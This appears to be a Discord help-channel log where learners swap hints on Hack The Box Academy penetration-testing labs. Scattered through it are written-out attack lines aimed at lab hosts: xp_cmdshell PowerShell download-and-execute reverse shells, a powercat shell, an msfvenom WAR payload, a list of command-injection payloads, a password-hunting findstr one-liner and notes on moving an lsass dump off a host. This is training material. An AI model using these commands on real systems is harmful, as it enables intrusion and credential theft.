I just got the correct answer, finally. But I found out by just typing in all the possible answers from the list Bunny gave me. But I doubt that was the right way to do it. I tried hydra -C ... But that didn't work. I also couldn't find an open port for MySQL.
Now I got the right answer by luck, nothing more. But I don't know what I missed and what I was supposed to learn from this and how this will help me in the future.
Anybody have a nudge for the hard lab for NMAP enumeration?
Hint is oh so confusing on what it wants from me.
Default passwords are often still used. It makes sense to simply try out a few default passwords.
Okay. I thought I was supposed to use Hydra -C user_pass.list MySQL://target, but maybe I assumed wrong.
I also assumed there was a connection with the previous credentials, because of the question. But apparently I was mistaken.
Yes, this lesson is not about Hydra, but about standard passwords and how to get them.
Okay, got it. I was completely thrown off by the way the question was formulated and the information given about Hydra -C in that section, lol. Good to know. This one absolutely had me pulling my hair out.
Ooo. I see you passed CPTS. Was that recent or did your role just take a bit to update?
I got the role very quickly.
Nice. Congrats on passing!
Today I got the certificate, asked the admin if I could get the role and shortly afterwards I got the role.
Thanks
I hope to be there soon
@acoustic owl congratulations
Thanks
Congrats @acoustic owl
2x 10 days
long journey
What happened with parrot terminal showing our own IP?
You need it so often, and it was handy to have there, why is it gone?
like so:
Hello, I downloaded and connected to the VPN and I'm able to do a ping and an nmap of the target machine
But I can't access the webpage that it has, can somebody help me?
I'm trying with Photobomb
@acoustic owl how many days did u study for the test? Any tips?
Is the page perhaps running on a different port?
The best thing to do is to ask in the right channel #boxes
I don't know, I never looked at the time.
I started about 1.5 years ago.
I see, I guess that is how long I need to study too then :p. Just started academy two days ago. Just did Linux Fundamentals and doing macOS rn.
Does anyone know if there is a way to link my academy profile to discord?
It's the default port, but it shows this message
If that address is correct, here are three other things you can try:
Try again later.
Check your network connection.
If you are connected but behind a firewall, check that Firefox has permission to access the Web.
I think i have to verify my account to see #boxes
Yes, you have to verify your Account
what is the best way to find a password in .txt file using a cmd oneliner?
grep
recursively? for the whole C: AND I have to change the directory
I am doing the Attacking SMB section under the Attacking Services Modules, I have found the share but do not have access to get the contents of the share. I have tried bruteforcing with the users jason and robin, to no success with crackmapexec.
Unsure what to do here
Grep "pattern" C:\\*
and for windows?
Can someone help me with Session Hijacking in XSS Module?
cd C:\ & cd & findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
guess this one does work
Why not .* After "password"
/C:string Uses specified string as a literal search string.
Well yes, I just mean when specifying the file type
good question but I guess you want to reduce the noise
Cheers!
I am working on AD Enumeration & Attack - Skills Assessment Part II. I am trying to answer question 4, but I just don't get it. I|| created a userlist and got quite a lot of usernames with two letters and 3 numbers. I also sprayed all those users with the password I found for the first user against every machine, with no luck. Using rockyou came to mind, did it for around 15 minutes, but the progress is quite slow.|| I would appreciate any nudges.
Try some common passwords that were mentioned in the password spraying section
Hi. I'm stuck at:
https://academy.hackthebox.com/module/80/section/777
||I identified that I need to use: Uppercase/Lowercase/Numbers, I used the :upper: :lower: :digit: regex which gave me 5 passwords. They don't work. What am I doing wrong. Any nudge would help!||
i used sed for this module
Alright thanks I'm going to find out what that is and give it a try!
Does someone know about that error? I tried both with and without the -smb2 option.
also, if you have an Excel spreadsheet handy, making a tried-passwords list (lower, upper, etc.) helps too
looks like there's an issue with direct connection to the target
can you ping it? can you access the service?
Ah that's smart, I'll try that too, thanks
I can join the target yes, I can't ping it, but I can join it
what do you mean by join? If you can't ping the box how do you want to relay to it? that doesn't make sense
Hi everyone. Today, after finishing the Information Security Foundations skill path, I'm beginning with the Penetration Tester job path and I'm looking for a study partner, if anyone is interested feel free to dm me
what kind of testing are you going to do?
When I finish with the Job path I would like to do the CPTS
the job path? is that an academy thing? I thought you were talking about doing a real pentesting job
can someone tell me how to fix this "Match file name by removing repeated file extension [example .accdb] then re-upload."!?
Can I DM you?
yea
what's it related to?
A file i'm trying to upload to SAM Cengage from Access.
But idk how to remove the repeated file....
I have no clue what any of those words mean
I may need a hint with the Windows Privilege Assessment Part 1.
Question: "Find the password for the ldapadmin account somewhere on the system."
I just can't find it.
I skipped it and I am already NT Authority\System but still can't find it
Lmao Cengage is a website for college students
SAM is also a website that we turn our work into..
so there's no connection to the htb academy?
dumped users?
I don't think so
why are you asking here then omg?
hello, do you have some crack for sale?
Hi! Guys, I've been taking the course for pentesting, and I've been trying to scan the IP in the course, but most of the time it says that the host is down. I have tried connecting to the academy VPN and everything, but it doesn't work anyway, any idea what's happening?
-_- nu
is the IP public or private?
Just thought one of you knew how to delete repeated file
I mean, I think the ip is public,
then VPN is not needed, meaning you can scan anything in the internet. If it's something like 10.10.x.y then it's private. https://en.wikipedia.org/wiki/Private_network
I'll check that, thank you
checking the ip example that you are giving me, it seems that the ip that I am trying to scan is private.
Hi, I need some help with module/116/section/1512. I can't seem to get subbrute to find the DNS name that includes the flag. I put the target IP in etc/hosts as "ip ns1.inlanefreight.htb"
any suggestions
vpn is needed then. If your vpn works fine, then use -Pn with nmap
thx
lol
what is it?
Wow man, I must be doing something stupid here. I have used all the lists now from the Usernames directory, except the xato ones... and still no hits.
I am currently in the Linux Fundamentals module tho.
ok
I don't get this question: "What is the path to the htb-student's mail?"
I've been checking every content in the directory but there's nothing found there
Got an idea about the user's mail path??
/mail/
Up to AD enumeration and attacks. Here we go

I've started my CPTS journey and seem to have run into a snag. I'm probably overthinking this, but I'm having trouble determining the service version in Firewall and IDS/IPS Evasion - Hard Lab. I think I've figured out which port but can't seem to get the service version
Have you tried connecting to it?
yeah get a timeout
Strange
Stuck on Attacking Email Services. I've grabbed the creds and just need to log in to read the emails... connecting to the IMAP server via curl isn't working and telnet/nc aren't useful here.... (right??) ... Please help lol @.@
There is just the IMAP connection type...
That is taught in the module
Or you can be big brain and use an email client
Evolution FTW.
0.0 Am I Blind~~~? lol
gonna try spinning up the cloud pwnbox provided, maybe a vpn issue
Lol heard, I'll break down and read the evo docs, I got away with curl for so long haha
thank you
I mean, it's not required, but I find it easier/quicker to visually work my way through a mailbox rather than interacting with IMAP/POP over the CLI.
^
i must have the wrong port getting a timeout in the cloud box as well
DM me the ports you see and the port you're trying?
can someone help me with " submit root flag " on dashboard
you should probably change your discord username to be taggable per the #rules :)
uhmm, sure, and can you help me ?
I'm looking for someone that is done with the Crackmapexec module
is dashboard a box? if so your question is better asked in #boxes ; if you cannot see that channel; then you can verify your htb account in #bot-commands
Is anyone able to assist me with the Footprinting Module and the DNS section. I've been stuck on the last question for the longest time. Attempting several different brute forces from the dig transfers.
is that the one with the "x.x.x.203"?
yeah
subdomains of subdomains, and may need a more ferocious wordlist ;)
I'll give that a shot. I've been trying so many variations for this lol.
the word list is in the dns discovery lists in seclists
if that helps narrow it down
but remember the subdomains you found can have their own subdomains
and technically I don't think there's a limit to how many subdomains there are, like a.b.c.e.f.g.h.i.j.k.example.com
Thats even more fun haha
but you don't need to really go that far with the right wordlist
just a thing you may see in other examples of like an admin.whatever.other.subdomain.example.com
Just curious. When you are using dnsenum, the IP that you use is it the original IP of the target IP or is it the one you find after zone transfers.
tysm for your help
you still use the original IP iirc
Okay. That may save me some time.
yep; it's just changing from the inlanefreight.htb to subdomain.inlanefreight.htb
ah okay, that makes more sense. Thank you
and of course; the right wordlist, because the top lists will not have it
For anyone struggling with Attacking Common Services - Medium, there are actually 6 open ports. Had to reset the target a few times to get more results.
thanks
did try it too but only got 4
@twin vine should it work to find all ports with a normal nmap scan? or does it want -p-
Don't know why -p- doesn't work every time.
Well some of the packets you are sending might drop, or the ones coming back
Hi! I'm from Poland. I don't know anything about hacking, but I'd like to learn about the API, because there is an application called "Żabka" and there are points to collect in it. Apparently they can be added to the application using the API. If anyone would like to help the cat, I would be grateful
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
as far as API not much we can help on that
This really isn't the place to ask for this assistance; please read #welcome ; as this channel is for assistance with modules found on https://academy.hackthebox.com ; to access other channels you will need to verify your hack the box account ( https://www.hackthebox.com ) I understand you found this server through searching "hacking" on the search - but if you read #welcome it should tell you what this server is about
Okay thanks
IF YOUVE DONE ACTIVE DIRECTORY SKILLS PLEASE DM ME ILL GIVE U TACO FLAVORED KIIIISSSSSES
oops sry for caps
clam it down sir
lol
sometimes that do be how it is
did you get the answers yet? because I've got the same problem
make sure you have ssh'd into the target
already did that but still can't find the user's mail path
okay, then try to use the find command
also you can check the environment variables
Got it, appreciate the help. Thanks!
Wow, was not easy but I did it
Great work!
Thanks
For anyone struggling with CME not working due to a TypeError in aardwolf:
...
TypeError: unsupported operand type(s) for |: 'type' and 'type'
Please apply the following patch:
https://github.com/skelsec/aardwolf/pull/10
Hello! i have the same problem, can you help me?
I'll take a look
I started that earlier today... it's a whopper of a module! Good job. I'm 1/3 of the way through.
Hey Guys, how can I build Snaffler.exe or Rubeus.exe?
when I download the GitHub repos there are no exe files and no explanation of how to install/build it.
Good luck
Thank you!
ON PIVOTING, TUNNELING, AND PORT FORWARDING module
Skills Assessment
how do I transfer the lsass dump back to my attack host
the --local-auth requirement in the SMB attacking common services had me pulling my hair out lol
I still don't really understand that flag. Is it for accounts you are trying to log into that aren't domain connected? If I get account creds I usually just try both now to see if any work
as I now believe I understand it, we were trying to brute-force his local host creds, not his domain creds
I used impacket's smbserver...pay attention to file permissions too or else the transfer will fail
the problem with little parameters missing off brute-forcing is that you always assume your wordlist is wrong, not your command
yes, I noticed that.. I tried transferring the folder but it fails
Yeah I'm pretty sure you'll only need the dump. It should be faster that way too
what permission should be given
I just gave Full Control for the account. You should also look at the sharing permissions too if you plan to use the SMB server method
you might need to use -smb2support also?
Yeah, good catch, that option is helpful for setting up the smb server
are you working through the job path Gate?
yeah, I did the transfer but I think I'm missing something.. it says No Module named impacket
Okay seems like you're getting there...you might not have impacket tools though
pip install impacket
it works well when I run python smbserver.py on my local host
oh okay good
but when i transfer it to the linux machine.. it doesn't
about to start the AD enumeration and attacks module, better grab a few litres of red bull
There are a few ways of connecting to a hosted smb server from a windows machine. The way I described above was my method of file transfer for that section but there are many ways that may work better for you. Check out https://lolbas-project.github.io/ and search /upload to find some built-in binaries for upload
Hello, anyone working around the attacking DNS module?!?!
there is no module like that
it is a section from some module prob. but I dont remember. Be more spesific
Yeap, it's from the Attacking Common Services module!
I'm using the tool subbrute but I can't make it work
I'm going through many different names in the resolvers.txt file but it doesn't find anything....
have you added the IP and domain name to /etc/hosts?
I have tried that but now I realize maybe I did it with .com instead of .htb
I will try that...
you should add that, it doesn't work otherwise. If it is .htb you definitely need to add that
I am working on Attacking Common Services hard and trying to get a reverse shell through cmdshell. Can someone help me with my syntax? I am sure there are other ways to get the flag, but I want to test this out.|| EXECUTE ('xp_cmdshell ''powershell IEX-New-Object Net.webclient).downloadString('http://10.10.14.10.2/rev1.ps1')'')') AT [LOCAL.TEST.LINKED.SRV]||
yeah I hate that part
I'm not there yet. Hopefully on the weekend I can start working on those labs!
a better image
I got others to work, just all the ' within the command is messing me up lol
Now it takes forever and only finds 1 extra domain....
is there something with the ns1.inlafreight.htb that I need to change...
there are 2 ( and there are 4 ) . I mean comm onnn hahahaha
I am shitty at SQL lol, be nice
Yeah I was feeling the same. hahah
do you mind DMing me an example
well I didn't go crazy like you. My commands were pretty simple
hahaha
like this
EXECUTE('xp_cmdshell ''dir C:\users''') AT [local.test.linked.srv]
yeah I just want to see if I can get a reverse shell
that's another one that works
EXECUTE('sp_configure ''xp_cmdshell'', ''1''') AT [local.test.linked.srv]
you need to put more ' and fix the parenthesis issue
It is pretty slow, unfortunately
yeah I have tried many different combinations and can't get it
Ok...
1> EXECUTE ('xp_cmdshell (''powershell IEX-New-Object Net.webclient).downloadString('''http://10.10.14.10.2/rev1.ps1''')'')') AT [LOCAL.TEST.LINKED.SRV]
2> go
Msg 102, Level 15, State 1
Server 'WIN-HARD\SQLEXPRESS', Line 1
Incorrect syntax near 'http:'.
You have five instead of four octets in your .downloadString.
ooo shit thanks
If you wanna make your life easier you can use certutil to do the download and drop the file to disk. Then execute it in a second command
It's not going to play nice with you using single quotes in the powershell command
just looking at your syntax... you didn't close the ' nor the "
yeah i figured I attempted to convert to base to just run it, but I was limited to characters
Yea. There are definitely ways to do it without dropping anything to disk but it's gonna be a decent headache to pull off
do you mind providing me an example of what it should look like
I have 7 min left on the box lol and trying not to reset it again haha
Nearly 10 minutes and nothing... should I try something else?!
I would try this @simple zephyr EXEC master..xp_cmdshell 'powershell.exe -nop -exec bypass -w1 -enc "SUVYIChpd3IgJ2h0dHA6Ly8xMC4xMC4xNC4xMC4yL3JldjEucHMxJykK"'
but I haven't tested that yet to see if it works - I'm not logged in to HTB atm
@simple zephyr I also just noticed something BIG in your command that will cause it to error out... your IP address is poorly formatted: http://10.10.14.10.2/rev1.ps1 there's too many octets
the encoded portion I have there represents the following command IEX (iwr 'http://10.10.14.10.2/rev1.ps1')
yeah i fixed that... thanks I am going to give that a try. Also I guess I could have used my RDP connection to transfer the file also, but this is one of my weaknesses thats why I am trying to explore more than what is required.
have to head to work, so I will spin it up tonight or on my lunch break and give it a try.
I'm doing the hard lab of nmap, and I'm having a hard time, I already scanned and found a filtered port with db2. Tried every type of scan (-sA, -sT, -sS / -T 1 ...)
Can someone help and say if I'm in the right direction or what am I missing?
Can I dm someone for the XSS assessment?
Kudos to the authors of the "USING CRACKMAPEXEC" module. I can only imagine how much effort must have been put into the final assessment. Nice job!
dm me
@flat oxide okay, I already did
Well can you connect?
Yes, I already finished the lab
what does this mean?
You've connected to your reverse shell on a target
if you type whoami - it will tell you who you're connected as
Can anyone help me out with my problem?
well it instantly breaks
has anyone else run into problems running crackmapexec? I finally managed to install it but it won't run
The data coming through the connection isn't human readable
Which list did you use?
the ones in the resources
I'm very confused why it's not working
Try it with Metasploit
okay
it keeps giving me a false positive
the very first user and pass are always correct, when I try the user as jason or robin I never get results
oh lol
nvm
Msfconsole works.
got the answer
If I am not mistaken fiona is not a user under sql. You need to bypass that and login with rdp creds. It's in the module
Hey everyone! I just completed the Footprinting - Easy lab. I did use the hint though. Is there anyone here who solved it without the hint? I would like to talk about my notes and the gaps in them
In the attacking email services, the list provided doesn't contain the user... or should it be there...
I have tried several username lists but no luck
it should be the one in the resources
nvm got it
haha
do you mind if i dm you?
sure
I'm working on the skills assessment for the "Attacking Web Applications with Ffuf" module:
https://academy.hackthebox.com/module/54/section/511
The third question says:
"One of the pages you will identify should say 'You don't have access!'. What is the full page URL?"
I've identified that page (see screenshot) but when I paste in the URL it says "Incorrect answer". Do I need to do anything special with the formatting?
Edit: solved. As per the hint, you have to enter the word "PORT" rather than the actual port number.
Hello! I'm in the attacking email servers section. I've got the username and password but I don't know how I am supposed to access his mailbox
have you done footprinting module
the commands of the pop3 don't work with this ESMTP console
I can't list or do anything... only the helo and 2 other commands work
is there other way
well the question is still the same
have you done footprinting
It takes a bit of researching; some things are not covered in the module
Yeah, but in footprinting I could use the normal USER PASS LIST RTRV commands
If you've taken notes, open them and check the things you've done
or else take notes
hahaha
I have no notes over ESMTP commands
I just want to know if it is through here where I will enter the emails... maybe it's in another place
hello
Got it... needed to access through another port... not 25... OBVIOUSLY it was not mentioned in the section...
thanks
has anyone finished this Attacking Common Services - Hard? Could someone help me out / DM? Thanks in advance. I have tried with sqlcmd but fail (edit: I connected and am now impersonating the "john" user, but I don't have the sysadmin role)
try something else
I'm about to start the easy lab of attacking services!!!
A lot of people have issues with sqsh, try mssqlclient instead
Afaik sqsh is broken on parrot as of now
Hi folks.... raw beginner, a little stuck here. (Q. What is the path to the htb-student's mail?) I have navigated to mail and PWD. Result is /var/mail
but apparently I'm wrong
add another / after mail
¯\_(ツ)_/¯
Good evening! Who can help with HTTPs/TLS Attacks: TLS Attacks - Skills Assessment?
Who can help with: Windows Priv escalation assessment part 2?
Hi guys, Can someone re-direct me to the correct Channel please:
Basically at my company we might have been "Hacked". I have found the IP Address but I would like to know more about it... Maybe someone is interested?
No. Please read the #rules.
Otherwise, leave it to the company to handle.
Ahaa okay got ittt
Can I get some help here?
Module: SHELLS & PAYLOADS, The Live Engagement
I finished everything besides the War file.. Tried everything...
used msfvenom to create a shell war file, uploaded it, but I got 404, or 500..
$ msfvenom -p java/jsp_shell_reverse_tcp lhost=IP.. lport=PORT.. -f war -o shell.war
Tried any other method I found, but still no luck..
psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125 - not working anyone else have issue with this in module -
Active Directory Enumeration & Attacks
Page 14
Credentialed Enumeration - from Linux
never mind
"no route to host" kinda self explanatory; alongside "Rpc_s_access denied"
okay I need an info:
I have a reverse shell but it is only alive for 10 secs because the process kills itself.
I start a service and because it is not running correctly it will die.
How can I avoid it?
I've been stuck for hours at the AD Skill Assessment Part 2 - Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
I've been trying for hours to get a reverse shell with xp_cmdshell "command.." but just get errors
any hints?
windows server 2019?
are you specifying the Domain Controller?
I open an http server
Serving HTTP on 0.0.0.0 port 8001 (http://0.0.0.0:8001/) ...
And trying:
1> xp_cmdshell 'powershell.exe -Command "IEX(New-Object System.Net.WebClient).DownloadString(''http://172.15.7.240:8001/powercat.ps'');powercat -c 172.16.7.240 -p 4444 -e cmd"'
2> go
tried different tools/methods, but nothing works
You put 2 single quotes at the beginning of the url, but never closed them. So it's trying to find a file at the url http://172.15.7.240:8001/powercat.ps%27%27);powercat -c 172.16.7.240 -p 4444 -e cmd".
That's a copy+paste mistake
Well if your command got messed up while copying then I'm not looking at an accurate command
When you send any commands in here put them between backticks (These: `)
Could anyone give me a nudge on Command Injection - Skills Assessment.
I'm trying to get CI in the endpoint ||GET /index.php?to=&dl=2470930823.txt||
I have spent few hours on this one. I have tried:
||\nwhoami
%0Awhoami
&ls
&&ls
%26ls
%26%26ls
%7Cls
%7C%7Cls
%7C%7Cwho\am\i
%7Cwho\am\i
%26%26who\am\i
%26who\am\i
%3Bwho\am\i
%60who\am\i%60
%60whoami%60
%24%28who\ami%29
%24%28whoami%29
;cat<2470930823.txt
3Bcat<2470930823.txt
%0Acat<2470930823.txt
%26cat<2470930823.txt
%26%26cat<2470930823.txt
%7C%7Ccat<2470930823.txt
%7Ccat<2470930823.txt
%60cat<2470930823.txt%60
%24%28cat<2470930823.txt%29
${LS_COLORS:10:1}cat<2470930823.txt
%26%26cAt<2470930823.txt
%26%26c\at<2470930823.txt
cat<2470930823.txt
$(cat<2470930823.txt)
%09$(cat<2470930823.txt)
%09%24%28cat<2470930823.txt%29
%09%60cat<2470930823.txt%60||
I'm out of ideas
Can hackthebox pls put back foxyproxy on pwnbox?
hey i dm you
@fathom pendant what percentage are u with cpts?
I haven't touched it recently; been busy with health stuff
ahh ok just was curious
Thanks guys!
someone in erratum too
Much appreciated
Thanks again for your contribution!
Need some hints for question Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host on final assessment 2 in the module Active Directory Enum and Attack.
I have found user and password and I know the ip for the MS01 box but have tried multiple ways in logging into it with found credentials with no success.
Any help would be greatly appreciated!
Has anyone done the attacking common services SQL? I got the password for the "Account" but where to go, to continue to enumerate flagDB?
In Password Attacks - Password Mutations, is there any way to speed up the whole process? Even with -t 40 in hydra, I need 40 minutes to crack the password (I mutated the included password list with best64.rule)
One question, where is the general chat?
thanks
hey I dm'd you
try attacking smb or ftp and see if there's password reuse. ftp and smb are like 4-5 times faster
also a few labs in pw attacks can take 30 -45 minutes only a few tho
in Attacking Common Applications at the Attacking GitLab section the gitlab_userenum script doesn't work... don't know what to do.. metasploit doesn't work either
dm'd u
in Footprinting - FTP there is a question "Which version of the FTP server is running on the target system? Submit the entire banner as the answer". I've done nmap banner grabs, used metasploit ftp_version and a couple of other things with the same banner/result, yet it says it's wrong. I've requested help but don't actually know what that does. Any ideas on this? cheers
Try resetting the machine and grabbing it again
Try grabbing the banner by connecting straight to ftp via telnet or ftp itself. Make sure not to grab the response code in your answer
Nmap is giving it too, I think you were grabbing it with the "220" response code
^ yeah it was the response code that made it wrong..... whoops
i'll see what I can do
if you're using it with Burp it's really better to use Burp's built-in browser. It's stripped down with no security but this streamlines web browser/application pentesting, as a lot of Firefox, Chrome and other browsers' default settings and security interfere with web pentesting.
Yeah but you can configure firefox to have worse settings
yep and if anyone is wondering it's just the Open Browser button on the proxy tab. The Burp Browser also has the TLS cert already imported in case you are working with https (last time I checked.)
FoxyProxy is also good if I want to quickly do HTTP through SOCKS
anyone able to sanity check with me, I'm on Footprinting - Host Based Enumeration - FTP
not showing the version in nmap scans
The version may not be what you're expecting, or just reset and try again